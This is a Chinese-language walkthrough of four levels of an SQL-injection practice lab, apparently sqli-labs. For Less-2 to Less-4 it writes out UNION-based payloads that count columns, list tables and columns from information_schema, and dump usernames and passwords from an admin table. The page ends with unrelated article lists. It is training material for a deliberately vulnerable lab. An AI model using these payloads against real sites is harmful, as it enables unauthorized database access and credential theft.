Less-1

1. 测试是字符型还是数字型

1. 判断所在字段数

   

2. 查看显示值

   

   可以看出显示2,3位置。因此我们选择2的位置进行联合注入

3. 查看表名

   

   • 我们要对admin，users等字符敏感

4. 查看admin表中的字段名

   

5. 显示内容

   

   获得flag：helloword

6. less-1的代码

   

Less-2

1. 判断字符型注入还是数字型注入

   

   通过匹配单引号我们可以看出我们所写的单引号并没有被匹配因此我们可以看出这是一个数字注入

2. 判断所在表的字段数

   -1+order+by+4
   
   

   

3. 查看显示位置

   -1+union+select+1,2,3
   
   

   

4. 查看表名

   -1+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
   
   

   

5. 查看admin表名的字段

   -1+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   
   

   

6. 查看内容

   -1+union+select+1,(select+concat(username,0x5c,password)+from+admin+limit+0,1),3--+
   
   

   

7. 代码查看

   

Less-3

1. 查看

   -1'
   
   

   

   由错误回显可以看出该类型为字符型注入，且需要闭合引号

   -1')--+
   
   

   
   
   发现构造成功

2. 判断字段数

   -1')+order+by+4--+
   
   

   

3. 查看显示位置

   -1')+union+select+1,2,3--+
   
   

   

4. 查看表名

   -1')+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
   
   

   

5. 查看字段

   -1')+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   
   

   

6. 查看内容

   

7. 代码审计

   

Less-4

1. 构造

   -1'
   
   

   

   无反应

   -1"
   
   

   

   发现我们需要闭合双引号和括号

   -1") order by 100--+
   
   

   

   发现构造成功

2. 判断该表的字段数

   -1")order+by+4--+
   
   

   

3. 判断显示位置

   -1")union+select+1,2,3--+
   
   

   

4. 查询表名

   -1")union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
   
   

   

5. 查看admin表中的字段名

   -1")union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
   
   

   

6. 获取admin表中内容

   -1")union+select+1,(select+concat(username,0x5c,password)+from+admin),3--+
   
   

   

7. 代码审计

   

最新文章

1. 威纶触摸屏和三菱PLC3S之间的通信设置
2. phpcms模板标签整理
3. commonlisp教程以及学习笔记-01
4. Mybatis Generator insert useGeneratedKeys keyProperty
5. 透彻分析反射的基础_Class类
6. MySQL主备停机步骤与注意事项
7. $(function(){})和$(document).ready(function(){}) 的用法
8. 暑假集训(4)第一弹 -----递推（Hdu2039)
9. uxpin books
10. 【Python】不定期更新学习小问题整理
11. android 业务需求： 先干掉自己， 在重启自己
12. 谷歌插件postman如果不能用，就用git命令发送post请求
13. VBS 操作注册表 十六进制
14. 苹果手机上点击WEUI日期控件不容易点中
15. 第三次Sprint-最后冲刺
16. gdb调试1--包括反汇编及文件编码设置
17. openresty的安装和使用
18. 前端 HTML body标签相关内容 常用标签 表单标签 form 表单控件分类
19. python3：logging模块 输出日志到文件
20. 【转】PowerDesigner code、name显示设置 及 同时显示办法

热门文章

1. python+selenium基础篇，句柄操作（多个页面切换）
2. 远程服务调用RMI框架 演示,和底层原理解析
3. OpenFeign远程调用原理
4. 【读书笔记】《基于UG NX系统的二次开发》笔记
5. 不管卷不卷，面试还是得问问你G1原理！
6. WPF中选择文件和选择文件夹的方法
7. 使用 TypeScript，React，ANTLR 和 Monaco Editor 创建一个自定义 Web 编辑器(二)
8. python读取csv文件数据绘制图像，例子绘制天气每天最高最低气温气象图
9. unity的安装,配置，及问题
10. C#调用JAVA（一）制作jar包